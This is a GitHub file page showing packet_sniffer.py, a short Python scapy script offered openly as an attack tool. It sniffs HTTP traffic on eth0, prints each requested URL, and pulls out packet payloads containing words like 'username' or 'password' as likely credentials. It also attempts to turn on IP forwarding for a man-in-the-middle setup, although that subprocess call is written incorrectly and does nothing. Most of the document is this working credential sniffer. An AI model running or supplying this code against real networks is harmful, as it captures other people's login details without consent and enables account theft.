-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathpacket_sniffer.py
More file actions
42 lines (30 loc) · 1.26 KB
/
packet_sniffer.py
File metadata and controls
42 lines (30 loc) · 1.26 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#!usr/bin/env python
import subprocess
import scapy.all as scapy
from scapy.layers.http import HTTPRequest
from scapy.layers.http import HTTPResponse
def sniff(interface):
# prn: allow us to specify a Callaback function
# Callback: a function that will be called every time this function captures a packet
scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)
def get_url(packet):
return packet[HTTPRequest].Host + packet[HTTPRequest].Path
def get_login_info(packet):
if packet.haslayer(scapy.Raw):
load = packet[scapy.Raw].load
keywords = ["username", "user", "login", "password", "pass", "email", "name"]
for keyword in keywords:
if keyword in load:
return load
def process_sniffed_packet(packet):
if packet.haslayer(HTTPRequest):
url = get_url(packet)
print("[+] HTTP Request >> " + url)
login_info = get_login_info(packet)
if login_info:
print("\n\n[+] Possible username/password > " + login_info + "\n\n")
# -------MAIN-------
# enabling port forwarding to allow packets flow trough the middle computer
subprocess.call(["echo", "1", ">", "/proc/sys/net/ipv4/ip_forward"])
# here specify the interface you want to sniff from
sniff("eth0")